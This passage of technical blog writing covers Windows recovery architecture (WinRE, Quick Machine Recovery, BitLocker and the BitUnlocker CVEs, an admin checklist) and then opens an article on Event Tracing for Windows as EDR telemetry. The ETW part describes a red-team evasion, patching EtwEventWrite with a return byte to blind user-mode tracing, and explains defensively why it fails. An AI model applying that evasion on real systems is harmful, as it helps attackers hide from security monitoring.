OSTree, the upstream of Fedora's atomic desktops and CoreOS, is "Git for operating system binaries" [@fedora-silverblue]. It stores content-addressed objects under /ostree/repo, builds atomic deployments as hardlink farms under /boot/loader/entries/ostree-$stateroot-$checksum.$serial.conf, performs a three-way merge of /etc between the booted deployment and the new one, and atomically swaps the boot directory by flipping a symlink between /ostree/boot.0 and /ostree/boot.1 [@ostree-atomic]. The crash-safe guarantee is verbatim: "if the system crashes or you pull the power, you will have either the old system, or the new one" [@ostree-atomic].

Fedora Silverblue, Fedora CoreOS, Endless OS, and (since 2024) Fedora's bootc container-based desktops all ship OSTree by default [@fedora-silverblue]. Where OSTree excels is server fleets and developer workstations; where it struggles is layered third-party packages crossing deployments (the rebase/deploy friction) and the absence of a network-reachable in-recovery remediation analogue to QMR.

Traditional Linux: dracut + GRUB rescue + initramfs

The "manual safe-mode + delete-the-file" model. A skilled operator with shell access plus iLO / iDRAC / IPMI serial-over-LAN can repair a Linux box; everyone else is in trouble. The CrowdStrike-style incident response on traditional Linux would look exactly the same as it did on Windows: per-device, skilled operator, no automation. The Linux distributions that did avoid this fate are the OSTree-based atomic ones; the conventional ones are at the same operator-bound floor Windows just climbed off.

flowchart TB subgraph WIN[Windows: WinRE + QMR] WIN_WIM[winre.wim on recovery partition or in OS-volume folder] --> WIN_WU[Windows Update endpoint] end subgraph APL[Apple: macOS] APL_PR[Paired recoveryOS] --> APL_SNAP[APFS snapshot revert] APL_FB[Fallback recoveryOS / 1TR in Secure Enclave] --> APL_SNAP end subgraph CHR[ChromeOS] CHR_BOOTA[ROOT-A] --> CHR_FALLBACK[Boot loader falls back to other root] CHR_BOOTB[ROOT-B] --> CHR_FALLBACK end subgraph OS[Linux atomic / OSTree] OS_DEPNEW[New deployment] --> OS_PRIOR[Prior deployment retained for rollback] end

A head-to-head comparison

The dimensions that matter are: year shipped, in-recovery network capability, auto-remediation, signed-but-faulty-driver protection, per-device operator cost during a fleet event, trust floor, and encrypted-volume recovery story.

Dimension	Windows WinRE + QMR	Apple SSV + recoveryOS	ChromeOS A/B + verified boot	Linux atomic (OSTree)	Conventional Linux
Year shipped	WinRE 2007 [@wiki-winre]; QMR 2025 [@ms-qmr]	SSV 2020; recoveryOS / 1TR 2020 [@apple-ssv, @apple-boot]	Verified Boot 2010 [@chromium-verified-boot]	OSTree 2012 (dev started 2011); rpm-ostree later [@ostree-atomic, @fedora-silverblue]	dracut 2009; GRUB 2 2009
In-recovery network capability	Yes (WPA/WPA2 Wi-Fi or wired) [@ms-qmr]	Yes for reinstall; no targeted remediation	Yes for recovery image fetch	No standard pipeline	No
Auto-remediation without operator	Yes (one-time or looped) [@ms-qmr]	No (user confirms reinstall)	Yes (boot loader fallback) [@chromium-autoupdate]	No (user selects rollback in GRUB)	No
Protection against signed-but-faulty drivers	Behavioural via MVI 3.0 SDP + user-mode AV [@ms-mvi, @ms-wri-jun-2025]	DriverKit / System Extensions push third parties out of kernel	A/B rollback auto-recovers in one boot cycle	Layered package rolls back with deployment	None
Per-device operator cost in a fleet event	O(1) -- publish remediation once	O(N) -- each user reinstalls	O(0) -- automatic per device	O(N) -- each user selects rollback	O(N) -- skilled operator per device
Trust floor (unrecoverable without external media)	Corrupted `bootmgfw.efi`, missing WinRE, lost BitLocker key	Failed 1TR (very rare)	Both root partitions plus EEPROM corrupted	GRUB unreachable	GRUB unreachable
Encrypted-volume recovery story	BitLocker recovery key required [@ms-qmr]	FileVault key required if at-rest read needed	Stateful partition holds user data only	LUKS passphrase required	LUKS passphrase required

The notable row is the per-device operator cost during a fleet event. QMR moves Windows from O(N) (pre-WRI) to O(1) (post-WRI). ChromeOS was already at O(0) thanks to the A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N).

Key idea: The per-device operator cost row is the one Microsoft engineered WRI to change. QMR moves Windows from O(N) to O(1). ChromeOS was already at O(0) by virtue of A/B rollback. Apple, conventional Linux, and OSTree-based Linux remain at O(N). This is the empirical justification for the thesis that resilience is a security property: pre-WRI Windows, despite shipping BitLocker, HVCI, and Secure Boot, had a recoverability complexity class worse than ChromeOS. A faulty signed driver could exploit that gap to deny service at fleet scale.

Three vendors got to fleet-scale recovery earlier. Microsoft's catch-up move is constrained by what Microsoft does not control: OEM partition layouts, BIOS/UEFI variance, BitLocker key escrow.Apple ships hardware-plus-OS and Google ships ChromeOS against an OEM-certified hardware spec, both of which let those vendors specify partition layout end to end. Microsoft ships the OS and asks OEMs to follow the Image Configuration Designer defaults; some do, some do not. The KB5028997 workaround for "recovery partition too small for new winre.wim" is precisely the artefact of Microsoft not being able to mandate the layout [@ms-winre-tech-ref, @ms-kb5028997]. Those constraints set hard limits on what WRI can fix, and they are the reason the trust-floor row in the table is longer for Windows than for ChromeOS.

9. Theoretical Limits and the BitUnlocker Counter-Current

Two well-known results from the systems and security literature say that no fielded recovery primitive can be perfect, and Microsoft's own offensive-research team demonstrated, at Black Hat USA 2025 in August 2025, exactly which limit WRI runs into [@alon-leviev].

The trust-floor lower bound

No system can recover from corruption of all of its boot-path code without external media, because the verification step that detects corruption is itself part of the boot-path code. ChromeOS encodes this with a write-protected EEPROM that an attacker cannot rewrite without a hardware write-protect override [@chromium-verified-boot]; Apple encodes it with the 1TR environment anchored in the Secure Enclave [@apple-boot]; Windows encodes it by requiring the EFI System Partition plus a signed bootmgfw.efi. Below that floor, QMR, OSTree, and APFS snapshots are all helpless. The recovery surface bounded by what fits in write-protected non-volatile storage is the lower bound on automated recovery.

The end-to-end argument applied to recovery

Saltzer, Reed, and Clark's 1984 End-to-End Arguments in System Design [@saltzer-reed-clark-1984] argued that correctness checks belong at the endpoints of a communication system, not in intermediate nodes. Applied to update pipelines, the argument predicts that bug-free updates cannot be guaranteed by intermediate nodes (the vendor's QA fleet, the CDN, the Windows Update service). Correctness can only be observed at the endpoint. The corollary is that the probability of a faulty update reaching production cannot be driven to zero by any amount of pre-release testing; the platform's design must instead bound blast radius and time-to-recovery of the faulty updates that will inevitably ship. MVI 3.0's SDP bounds the first (deployment rings); QMR bounds the second (network-reachable remediation). The argument is identical to the canary / progressive-rollout pattern in Google's SRE Book Release Engineering chapter [@sre-release-eng].

The attack-surface trade-off

An auto-unlocking, network-reachable recovery environment expands the Trusted Computing Base. Every additional capability added to the recovery path is a new code path; a new code path is a new attack vector. The BitUnlocker research, by Netanel Ben Simon and Alon Leviev at Microsoft's Security Testing and Offensive Research (STORM) team [@alon-leviev, @ms-bitunlocker-blog], is the most pointed evidence we have that the trade-off is real.

STORM -- Security Testing and Offensive Research at Microsoft -- is the internal red team. Their job is to break Microsoft products before someone else does. BitUnlocker was first presented at Black Hat USA 2025 and DEF CON 33, both in August 2025; the four CVEs were patched in the July 8, 2025 cumulative update, ahead of the disclosure [@alon-leviev, @ms-bitunlocker-blog]. The patches landed one Patch Tuesday cycle before QMR went generally available [@ms-wri-ignite-2025]. In the same summer, the same vendor that made WinRE reachable from Windows Update made WinRE harder to abuse. The set of hardware, firmware, and software components on which a system's security policy ultimately depends. A bug in a TCB component can undermine the entire security policy; everything outside the TCB is, by definition, untrusted relative to it. Recovery environments expand the TCB because they need privileged access to encrypted user state.

The four BitUnlocker CVEs are all rated CVSS 6.8:

CVE-2025-48804 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via boot.sdi parsing.
CVE-2025-48003 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via SetupPlatform.exe / Shift+F10 abuse during the WinRE Apps Scheduled Operation.
CVE-2025-48800 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via tttracer.exe abuse during Offline Scanning.
CVE-2025-48818 [@ms-bitunlocker-blog] -- BitLocker Security Feature Bypass via BCD parsing in the Online PBR exploit chain; the fourth pillar of the chain.

The published Microsoft Security blog post on BitUnlocker enumerates the architectural attack surfaces verbatim under three section headings: Attacking Boot.sdi Parsing, Attacking ReAgent.xml Parsing, and Attacking Boot Configuration Data (BCD) Parsing [@ms-bitunlocker-blog]. The premise is the same in every case. WinRE must read the OS volume's BitLocker recovery material to perform repairs. Therefore WinRE has code paths that, given the right inputs, can obtain the decrypted Full Volume Encryption Key. The four CVEs each find a parser or debugger inside WinRE whose input handling can be steered by an attacker with brief physical access to flip the recovery flow into a state where the decrypted FVEK becomes reachable.

flowchart TD PA[Physical access foothold] --> SDI[Attacking boot.sdi parsing -- CVE-2025-48804] PA --> RA[Attacking ReAgent.xml / SetupPlatform.exe -- CVE-2025-48003] PA --> BCD[Attacking BCD parsing / Online PBR -- CVE-2025-48818] PA --> TT[Abusing tttracer.exe Offline Scanning -- CVE-2025-48800] SDI --> FVEK[Reach decrypted FVEK on OS volume] RA --> FVEK BCD --> FVEK TT --> FVEK FVEK --> EX[BitLocker bypass; data exfiltration]

The encrypted-volume impossibility

Unattended recovery of an encrypted volume without the key is impossible. It is a security correctness requirement, not a limitation that engineering can fix. QMR explicitly does not bypass BitLocker [@ms-qmr]. Apple's FileVault, ChromeOS's TPM-bound user partition, and Linux LUKS all share this property; none of them gets to be exempt from the requirement that the key be present somewhere before the encrypted volume can be modified offline.

Note: Every additional capability added to the recovery path is an additional attack vector against the encrypted user state that the recovery path is privileged to access. QMR's network reachability is a feature for the operator and a feature for the attacker. The article's thesis is not WRI makes Windows safer in absolute terms; it is WRI moves the trade-off to a different curve. The same vendor making the recovery surface reachable from Windows Update is the vendor that has to harden it against itself.

The upper bound

ChromeOS A/B auto-rollback recovers a single device in one reboot cycle without operator action [@chromium-autoupdate]. This is the empirical upper bound on automation. No fielded platform recovers a signed-but-faulty boot path faster than one reboot per device. QMR matches the ChromeOS upper bound in the steady state once a remediation is published; the only thing QMR cannot do that ChromeOS does is recover from the first signed-but-faulty update before Microsoft has authored the remediation. The lower bound on time-to-fleet-recovery is set by the production lead time of Microsoft's own QA pipeline plus the time to author and publish the targeted patch.

Microsoft's own offensive-research team published the BitUnlocker chain one Patch Tuesday before QMR went generally available. That is not a coincidence; it is the price of moving WinRE up the trust ladder. The next question -- what has not been priced yet? -- belongs in the open-problems list.

10. Open Problems: Where Microsoft Has Not Committed

WRI is a current commitment with a published roadmap. The roadmap has explicit holes. Each of the six below is documented from a primary Microsoft source -- either by what the source says or, in the most honest cases, by what it does not say.

Network protocol surface in WinRE. The Microsoft Learn QMR page is explicit: only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported as of November 2025 [@ms-qmr]. Enterprise 802.1X and WPA3-Enterprise with device certificates are committed in the November 18, 2025 update as coming soon under the Wi-Fi 7 for Enterprise and WinRE-reads-from-Windows lines, but no shipping date is published [@ms-wri-ignite-2025]. For an enterprise on 802.1X, this is the most visible gap: a managed-fleet device on a corporate SSID cannot reach Windows Update from inside WinRE today.

Safe-mode hardening as a discrete deliverable. The phrase "safe mode hardening" has no first-party Microsoft anchor as a discrete WRI deliverable. The closest documented item is Administrator Protection, announced in the November 19, 2024 Ignite blog as a constraint on elevated-context behaviour [@ms-wri-ignite-2024]. That is not the same thing. The Safe Mode boot path that the CrowdStrike incident used to delete C-00000291*.sys was the same Safe Mode boot path that has existed since Windows NT; nothing in the WRI primary sources commits to changing what Safe Mode does or does not load. Honest reading: WRI re-prices the recovery surface around Safe Mode; it does not (yet) change Safe Mode itself.

Cross-vendor partition layout. The Microsoft Learn WinRE Technical Reference [@ms-winre-tech-ref] documents the recommended ICD-media layout but does not enforce it. Clean Windows Setup, OEM-installed Windows, and ICD-media-installed Windows produce different recovery-partition layouts, and the existence of KB5028997 (the well-known workaround for "recovery partition too small for the new winre.wim") is a direct consequence. ChromeOS and macOS do not have this problem because Google and Apple control the layout end to end. Microsoft chose, decades ago, not to.

Third-party MDM support for the WinRE plug-in model. The November 18, 2025 update describes the WinRE plug-in model as third-party-MDM-adoptable, but no third-party MDM vendor had shipped a plug-in or a QMR management surface as of that announcement [@ms-wri-ignite-2025]. Customers on JAMF, Workspace ONE, Tanium, or similar do not yet have a documented integration path. If the future of recovery is Intune-coupled, WRI's reach is bounded by Intune adoption.

BitLocker key escrow as a WRI deliverable. No WRI primary source ([@ms-wri-ignite-2024, @ms-wri-jun-2025, @ms-wri-ignite-2025]) names "BitLocker recovery key flows" as a discrete WRI deliverable. The adjacent items are: hardware-accelerated BitLocker on new devices starting spring 2026 [@ms-wri-ignite-2025]; the BitUnlocker CVE patches in July 2025 [@ms-bitunlocker-blog]; and the Entra ID self-service BitLocker recovery flow at aka.ms/aadrecoverykey [@ms-kb5042421]. The current state is that BitLocker key escrow is an Entra ID and Intune feature, not a WRI feature. QMR's value is bounded by BitLocker key availability for the encrypted-volume fraction of any fleet; a WRI deliverable that improved key escrow would compound QMR's benefit. None has been announced.

Recovery in air-gapped and sovereign environments. QMR routes through Windows Update. Air-gapped fleets, sovereign-cloud customers, and offline manufacturing networks cannot reach Windows Update from WinRE. The November 18, 2025 update mentions Connected Cache, but no QMR-Connected-Cache integration is committed [@ms-wri-ignite-2025]. For the high-assurance customer who today does not let manufacturing endpoints talk to the public Internet at all, QMR is a feature for someone else.

Note: The six items above are gaps in the roadmap, anchored either by what Microsoft has explicitly named as coming-soon or by the absence of a primary source. They are not features. The article distinguishes Microsoft-committed deliverables (cited to a primary source) from adjacent inferences. Readers reviewing WRI for their own fleets should do the same.

These six gaps are where the next year of WRI roadmap will be argued. None of them is closed; some are closed-soon. For the practitioner, the immediate question is what to do, today, with what is shipping right now.

11. Practitioner's Guide

Everything above is architecture. This section is the checklist.

1. Verify WinRE is provisioned. Run reagentc /info from an elevated prompt. The output should say Windows RE status: Enabled and point at a sensible WinRE location -- typically \?\GLOBALROOT\device\harddisk0\partitionN\Recovery\WindowsRE or C:\Windows\System32\Recovery\WindowsRE. If the status is Disabled, run reagentc /enable. If the recovery partition is too small for a new winre.wim (a known issue surfacing with cumulative updates that grow the image, surfaced as a System event ID 4502 with ErrorPhase 2), follow KB5028997 [@ms-kb5028997, @ms-winre-tech-ref].

The mitigation, in outline: disable WinRE temporarily (`reagentc /disable`); shrink the OS partition via `diskpart` by enough megabytes (250 MB minimum per Microsoft's published procedure) to host a larger recovery partition; recreate the recovery partition with the GPT Type ID `DE94BBA4-06D1-4D40-A16A-BFD50179D6AC` and the GPT attributes value `0x8000000000000001` that hides it from automounting; re-enable WinRE (`reagentc /enable`) so the new `winre.wim` is copied into the resized partition. The Microsoft Support KB article carries the exact `diskpart` commands [@ms-kb5028997], with the Windows RE Technical Reference as the architectural anchor [@ms-winre-tech-ref]. Test on a representative device first; the resize is not reversible without re-imaging.

2. Audit your QMR posture before turning it on. On Enterprise, Education, and managed Pro, cloud remediation is off by default [@ms-qmr]. Decide first; ring second; roll out third. The Intune Settings Catalog path is Remote Remediation > Enable Cloud Remediation. Pre-stage a WPA/WPA2 Wi-Fi credential via reagentc.exe /SetRecoverySettings if your recovery network is wireless.

3. Use the test-mode dry run. reagentc.exe /SetRecoveryTestmode followed by reagentc.exe /BootToRe triggers a simulated QMR cycle. The simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS. Run it on a pilot ring before depending on QMR in a real incident [@ms-qmr].

4. Plan for BitLocker key availability. Ensure recovery keys are escrowed to Entra ID, not just printed on a card in a drawer. Enable the Entra ID self-service flow at aka.ms/aadrecoverykey so an unattended user can retrieve their own key during an incident [@ms-kb5042421].

5. Know the difference between Cloud Reset, QMR, and Autopilot Reset. Cloud Reset (in-Windows Reset this PC > Cloud download) reinstalls a running OS [@ms-pbr-overview]. QMR runs in WinRE before the OS boots, applying targeted patches from Windows Update [@ms-qmr]. Autopilot Reset re-provisions a bootable device via Intune. Three different tools, three different scenarios; do not confuse them in your runbook.

6. Watch for the November 2025 Intune signals. Once Intune surfaces WinRE state in the admin centre, build the muscle of looking for it. The roll-up that tells you "12 devices are in WinRE right now" is the operational primitive Microsoft did not have through July 2024 [@ms-wri-ignite-2025].

Note: Promote step 3 (the test-mode dry run) into your incident-response runbook now [@ms-qmr]. The time to discover that the recovery Wi-Fi SSID changed last quarter is not in the middle of a fleet-down event.

Note: QMR cannot decrypt the OS volume. It applies Windows Update patches that take effect on the next boot, but it cannot run against an encrypted volume's contents without the BitLocker recovery key being available [@ms-qmr]. If a device's BitLocker key is not escrowed to Entra ID and the user is not available to read it from a printout, QMR cannot help. Key escrow is upstream of recovery; treat it that way.

The reagentc /info output is short and uniform enough that a small script can classify the device's WinRE health. The block below sketches one in JavaScript pseudocode.

{` // reagentc /info is a small, deterministic text block. Parse it.

const sampleOutput = ` Windows Recovery Environment (Windows RE) and system reset configuration Information:

Windows RE status:         Enabled
Windows RE location:       \\\\?\\\\GLOBALROOT\\\\device\\\\harddisk0\\\\partition4\\\\Recovery\\\\WindowsRE
Boot Configuration Data (BCD) identifier: a1b2c3d4-...-winre-guid
Recovery image location:
Recovery image index:      0
Custom image location:
Custom image index:        0

REAGENTC.EXE: Operation Successful. `;

function classify(output) { const status = /Windows RE status:\s+(\w+)/.exec(output)?.[1]; const location = /Windows RE location:\s+(\S+)/.exec(output)?.[1] || ''; const partitionMatch = /partition(\d+)\\Recovery\\WindowsRE/.exec(location); const onPartition = !!partitionMatch; const onOsVolume = /^[A-Z]:\\Recovery\\WindowsRE/.test(location);

if (status !== 'Enabled') { return { status, action: 'reagentc /enable -- WinRE is not active' }; } if (!onPartition && !onOsVolume) { return { status, action: 'Unknown layout; verify with diskpart and reagentc' }; } if (onPartition) { return { status, layout: 'recovery-partition', partition: partitionMatch[1], note: 'If cumulative updates fail with insufficient-space errors, see KB5028997', }; } return { status, layout: 'os-volume-recovery-folder', note: 'OEM-style layout; some Intune' + ' policies assume a separate partition. Confirm before relying on remote remediation.' }; }

console.log(classify(sampleOutput)); `}

The practical questions answered, the article closes with a set of FAQs that catch the common misconceptions.

12. Frequently Asked Questions and Closing Thoughts

No. WRI's *Windows endpoint security platform* gives MVI partners a user-mode runtime so their detection logic does not have to live in a kernel-mode `.sys` file [@ms-wri-jun-2025, @ms-wri-ignite-2025]. Kernel-mode drivers as a class are not retired: the November 18, 2025 update is explicit that "graphics drivers, for example, will continue to run in kernel mode for performance reasons" [@ms-wri-ignite-2025], and the driver-resiliency playbook (compiler safeguards, driver isolation, DMA-remapping, higher signing bar) is precisely for the kernel-mode surface that will remain. No. The Microsoft Learn QMR page is explicit that the recovery flow does not decrypt the OS volume [@ms-qmr]. If the BitLocker recovery key is unavailable, QMR cannot help. The recommended escrow path is Entra ID, with the user-facing self-service flow at `aka.ms/aadrecoverykey` [@ms-kb5042421]. No. The BCD Boot Options Reference enumerates every legal element on a boot entry, and there is no `/recovery` flag on `winload.efi` or `winload.exe` [@ms-bcd]. WinRE is selected by following the `recoverysequence` element of the OS-loader entry to a separate BCD entry whose `winpe` is `Yes` and whose `osdevice` mounts `winre.wim` from a `boot.sdi`-backed RAM disk. The entire handoff is inside the boot manager, before `winload.efi` runs. No. The four CVE-2025-48800/-48003/-48804/-48818 advisories were patched in the July 8, 2025 cumulative update before QMR went generally available in August 2025 [@ms-bitunlocker-blog, @ms-wri-ignite-2025]. The patches addressed parser and debugger code paths inside WinRE; they did not remove WinRE's ability to read the OS volume's BitLocker recovery material, which is a feature WinRE needs in order to perform any repair on an encrypted volume. No. The Secure Future Initiative (SFI), announced in November 2023, is Microsoft's company-wide security program. WRI is the Windows-specific workstream inside SFI that owns Windows availability, kernel resilience, and the recovery surface; the published WRI blogs frame it as the Windows pillar of SFI rather than a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025]. QMR will not connect. The Microsoft Learn page is explicit that only wired Ethernet and WPA/WPA2 password-based Wi-Fi are supported [@ms-qmr]. The November 18, 2025 update commits to WPA3-Enterprise with device certificates as part of the WinRE-reads-from-Windows networking work and the *Wi-Fi 7 for Enterprise* line, but it does not give a shipping date [@ms-wri-ignite-2025]. For now, enterprises whose recovery story depends on QMR over Wi-Fi must either stand up a dedicated WPA2-PSK recovery SSID or rely on wired recovery. The code is mostly the same. What changed is the *policy* that lets WinRE call Windows Update without an operator at the keyboard. WinPE has shipped networking drivers since 2002 [@ms-winpe-intro], and `winre.wim` has been bootable from a recovery partition since 2009. The breakthrough is the commitment that the recovery environment is allowed to phone home -- and the surrounding program (MVI 3.0, the user-mode AV platform, Intune visibility) that makes it usable as a fleet-scale primitive.

Closing

The Windows Recovery Environment that worked perfectly on July 19, 2024 is the same Windows Recovery Environment that became Microsoft's most important security surface on August 1, 2025. The architecture did not change in the year between. The question we ask of it did.

The CrowdStrike incident did not invent the case for resilience as a security property. It priced it. Two months after the bug check signature csagent+0xe14ed made the rounds, Microsoft and the MVI cohort sat down at WESES to argue out what would become MVI 3.0 [@ms-weses]. Three months after that, the Ignite 2024 keynote committed to Quick Machine Recovery and to a user-mode antimalware platform [@ms-wri-ignite-2024]. Five months after that, the first QMR code shipped on the Beta Channel [@ms-qmr-insider-mar2025]. Twelve months after the incident, MVI 3.0 was binding [@ms-wri-ignite-2025]. Thirteen months after, QMR went generally available -- and BitUnlocker had been patched a month earlier in the July 2025 cumulative update. Sixteen months after, Microsoft published the rebuild-without-shipping-hardware roadmap [@ms-wri-ignite-2025].

WRI does not eliminate the trade-off between recoverability and attack surface. It moves the trade-off to a curve where the per-device cost of a fleet-down event is not bounded by human attention, and where the recovery code path is hardened by the same vendor's offensive-research team. Those are different curves than the ones the platform was on in July 2024. They are not the curves a textbook chapter on Windows internals would have predicted in 2014. They are also still the curves of a single vendor's program, anchored on a small number of blog posts and Microsoft Learn pages, and the work of validating them belongs in every fleet that depends on Windows for availability.

If WinRE worked perfectly on July 19, 2024 and that was the problem, the test of WRI is whether the next July 19, 2026 never makes the news.

ETW: How Windows 2000's Performance Hack Became the EDR Substrate

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Event Tracing for Windows is the high-rate, kernel-buffered observability bus that every modern Windows EDR consumes. A 2007-era architectural decision -- letting eight sessions read the same provider concurrently -- is what makes multi-vendor coexistence possible on a single host. Microsoft's `Microsoft-Windows-Threat-Intelligence` provider, gated behind Protected Process Light and an ELAM-signed Antimalware certificate since the Windows 10 RS-era, fires from the kernel side of memory-modifying syscalls and survives the user-mode `EtwEventWrite` patch class that defined red-team tradecraft from 2020 to 2022. The remaining attack surface -- BYOVD-driven kernel tampering -- is structurally narrowed by the Vulnerable Driver Blocklist enabled by default since Windows 11 22H2, with the residual sub-microsecond-payload gap remaining as ETW's irreducible "observation, not enforcement" limit.

1. Why didn't the patch silence Defender?

A red-team operator drops onto a 2026 Defender [@paragmali-com-war-it]-protected box and runs the move that worked five years ago. They locate ntdll!EtwEventWrite in the calling process, write the byte 0xC3 over the function prologue, and the calling process now silently fails to emit user-mode ETW events. The .NET CLR provider goes dark. Invoke-Mimikatz loads from execute-assembly without lighting up Microsoft-Windows-DotNETRuntime. Defender catches the credential dump [@paragmali-com-and-the] anyway, four seconds later, and the operator is on a SOC analyst's screen before the shellcode finishes running.

The patch worked. The .NET tracing provider in that process is mute. Attach a debugger and disassemble the function prologue: the first byte is now 0xC3, the near-return opcode [@felixcloutier-ret] [@felixcloutier-ret], and any caller falls straight back to its return address before producing a single event. The technique is the one Adam Chester documented in March 2020 [@xpn-hiding-dotnet] [@xpn-hiding-dotnet], and to a generation of red teamers it has functioned as a near-universal ETW evasion ever since.

So why did Defender still fire?

Because Defender does not consume Microsoft-Windows-DotNETRuntime to detect a credential dump. It consumes Microsoft-Windows-Threat-Intelligence [@fluxsec-eti] [@fluxsec-eti] -- a provider whose GUID is {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, whose events fire from inside the kernel side of memory-modifying syscalls, and whose producer the user-mode patcher cannot reach. The patch operated on a ntdll trampoline. The signal Defender used was emitted from a different layer entirely.

Key idea: Modern Windows EDR is layered on ETW, and the layers fail under different attacks.

That single asymmetry -- one provider goes dark to a one-byte patch, another fires from a place the patcher cannot touch -- is the spine of this article. Around it sits a 26-year story of one Microsoft team accidentally building the substrate of every modern Windows endpoint security product.

A high-rate, kernel-buffered tracing facility built into Windows since 2000. Components called *providers* emit events tagged with a GUID; *controllers* configure trace sessions; *consumers* subscribe to live event streams or read recorded `.etl` files. ETW was designed for low-overhead developer diagnostics; it was retrofitted into the security-telemetry substrate that all modern Windows EDR products consume. A class of endpoint security product that ingests behavioural telemetry (process creation, image load, memory allocation, network connection, registry change), correlates it against detection logic, and produces alerts and response actions. On Windows, the dominant EDRs (Microsoft Defender for Endpoint, CrowdStrike Falcon, SentinelOne, Elastic Defend, Wazuh, Sysmon-plus-SIEM) all build on ETW or on the same kernel callbacks ETW exposes to the user-mode tier.

To understand why a one-byte patch silences one provider but not another, we have to go back to a Windows 2000 design decision about per-CPU ring buffers.

2. ETW in Windows 2000: the performance problem that started it all

Imagine a 1999 network-driver author. A customer's NT4 production server is corrupting packets under load and the only available instrumentation is DbgPrint. Each call serialises through a kernel debug port, costs measurable percentage points of CPU on a busy box, and ships data to whoever happens to have the kernel debugger attached. The customer says no. The bug reproduces only at production traffic levels. You cannot ship enough printf-debugging through a debug port to find it.

That is the engineering pain Insung Park and Ricky Buch's team was solving when ETW shipped with Windows 2000. Their design moves -- recorded years later in the definitive April 2007 MSDN Magazine article on the Vista upgrade [@ms-park-buch-2007] [@ms-park-buch-2007] -- still define the architecture two and a half decades later.

The first move was per-CPU ring buffers. A producer on CPU 7 writes to CPU 7's buffer with no lock contention against producers on other CPUs. Hot-path tracing on a 64-core machine does not serialise. The kernel allocates at least two buffers per logical processor [@ms-event-trace-props] [@ms-event-trace-props] so a producer can keep writing while a writer thread drains the previous buffer.

The second move was an asynchronous writer thread. The producer never blocks on disk I/O. It writes to its CPU's buffer and returns. A separate kernel thread drains buffers to file or hands them to a real-time consumer. ETW pushes the latency tax onto the consumer and the storage path, never onto the producer's hot loop.

The third move was dynamic enable and disable. Park and Buch describe the resulting capability in one sentence:

ETW gives you the ability to enable and disable logging dynamically, making it easy to perform detailed tracing in production environments without requiring reboots or application restarts. -- Park & Buch, *MSDN Magazine*, April 2007 [@ms-park-buch-2007]

That sentence is the entire reason ETW could later become the EDR substrate. A producer compiles its trace points into shipping code at low cost; a controller flips them on at runtime when somebody actually wants the data. Without that property, you cannot build a security product that ships universal kernel tracing on a billion endpoints.

The fourth move was the trichotomy of providers, controllers, and consumers [@ms-etw-wdk] [@ms-etw-wdk]. Microsoft did not write ETW as an internal-only facility. From the start, third parties could write providers (driver authors instrumenting their own code), controllers (performance tools starting and stopping sessions), and consumers (analyzers reading event streams). The architecture is open by design.

A component that emits ETW events, identified by a GUID. A provider is registered with the system at runtime via the `EventRegister` API (or its predecessor `RegisterTraceGuids` for classic providers) and emits events via `EventWrite` (or `TraceEvent`). Providers ship inside Windows itself, inside Microsoft applications, and inside any third-party binary that wants to expose tracing. A component that creates, configures, enables, and stops trace sessions. Controllers select which providers a session subscribes to and at which level and keyword bitmask. The Windows Performance Recorder, `logman`, `xperf`, and every EDR's session-management code are controllers. A component that reads events from a session in real time or from an `.etl` file on disk. Consumers register a callback that the system invokes once per delivered event. The Windows Performance Analyzer, the krabsetw library, SilkETW, and every EDR's sensor process are consumers. flowchart LR Ctl[Controller
StartTrace + EnableTrace] --> Sess[Trace Session
per-session buffer pool] P1[Provider on CPU 0] --> CPU0[CPU 0 buffer] P2[Provider on CPU 1] --> CPU1[CPU 1 buffer] P3[Provider on CPU N] --> CPUN[CPU N buffer] CPU0 --> WT[Writer thread
asynchronous drain] CPU1 --> WT CPUN --> WT Sess -.governs.-> CPU0 Sess -.governs.-> CPU1 Sess -.governs.-> CPUN WT --> File[(.etl file)] WT --> RT[Real-time consumer
OpenTrace + ProcessTrace]

The original Windows 2000 implementation supported 32 trace sessions running simultaneously [@ms-etw-sessions] [@ms-etw-sessions], a number Microsoft later raised to 64 globally. ETW was framed as a developer-diagnostics facility -- the Windows Driver Kit primary still describes it that way [@ms-etw-wdk] [@ms-etw-wdk] -- and the security-telemetry use case did not exist for almost a decade.

But the design choices that made ETW good for low-overhead production diagnostics turn out to be exactly the design choices a security telemetry bus needs. Per-CPU buffers solve the multi-core throughput problem. Asynchronous writes solve the producer-latency problem. Dynamic enable solves the always-shipping-but-mostly-off problem. The trichotomy solves the third-party-extensibility problem. Twenty-five years later, every modern Windows EDR consumes telemetry through the same four primitives.Windows 2000's 32-session global cap [@ms-etw-sessions] is preserved verbatim on the modern Microsoft Learn page: "Windows 2000: Supports only 32 event tracing sessions." The cap doubled to 64 in later releases and has stayed there ever since.

The 2000-era design carried one limit, however, that turned out to matter for security: only one trace session could enable a classic provider at a time. The next ten years would be defined by the consequences.

3. The MOF era: one session, one steal, one decade of coexistence pain

In 2005, a third-party performance monitor that registered a classic provider could find itself silently disabled the moment Microsoft's wprui.exe started its own session against the same provider GUID. The first session got no error. It just stopped receiving events. That second-consumer-steals-first behavior is the architectural fact of the entire 2000-2007 era.

Microsoft Learn still documents the rule in one sentence:

Note: "Up to eight trace sessions can enable and receive events from the same manifest-based provider. However, only one trace session can enable a classic provider. If more than one trace session tries to enable a classic provider, the first session would stop receiving events when the second session enables the provider." -- Microsoft Learn, Configuring and Starting an Event Tracing Session [@ms-etw-config] [@ms-etw-config]

That single rule made multi-EDR coexistence on classic providers structurally impossible. If Defender's predecessor and a third-party HIPS both wanted real-time process events from the same classic provider, they had to fight for it. The loser got silence with no notification.

The provider class involved was MOF-based, named after the schema language that described its events.

The schema description language inherited from WBEM (Web-Based Enterprise Management). For ETW, MOF files describe each event a classic provider can emit -- field names, types, tasks, opcodes -- and are compiled into the WMI repository at install time using `mofcomp`. Consumers decode events by querying the WMI repository for the matching MOF schema. A synonym for *MOF provider*. The original ETW provider class introduced in Windows 2000. Registered with `RegisterTraceGuids`, emits events via `TraceEvent`, decoded against a MOF schema in the WMI repository. Capped at one trace session per provider.

